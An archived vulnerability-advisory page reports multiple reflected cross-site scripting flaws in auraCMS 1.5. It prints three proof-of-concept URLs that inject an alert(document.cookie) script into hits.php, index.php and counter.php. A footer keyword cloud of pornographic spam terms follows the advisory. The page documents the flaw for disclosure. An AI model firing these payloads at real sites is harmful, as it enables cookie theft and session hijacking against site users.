about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , auraCMS Multiple Cross-Site Scripting Vulnerabilities


Title auraCMS Multiple Cross-Site Scripting Vulnerabilities
Published 2005-03-02-12:00AM
Updated 2005-03-02-05:32PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of these vulnerabilities is credited to echo staff <y3dips@echo.or.id>
Vulnerable  auraCMS auraCMS 1.5
Not Vulnerable  
Code   The following examples are available:
http://www.example.com/[aura]/hits.php?&hits=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/[aura]/index.php?query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&pilih=search
http://www.example.com/[aura]/counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C/script%3E
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 15:01:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.80845. www.0000wm sexyphotos teen www.nv8.cn opansex PHP ZendEn www.amplan ,,sex,,com bad room WWWSEX.COM porno movi dav scanne Www.sexwal www.sex.co v2003.83 vuln/explo vBShout www.danbai mature-ero Www.naruto indian sex Sexgils.co flirt.com maxcpm.inf wwsexy MAC OS X 1 IE exploit Dragonfly ngix cisco leve sexxxll news for C 200 /compo SQL Inject Kirim Sextube.co 200 /compo hulya kocy maxcpm.inf Bettyboop Nudesexygr Sexgils.co image.html Aiswaryara sri lanka t102t www bad jo www.it22.c mitchel vi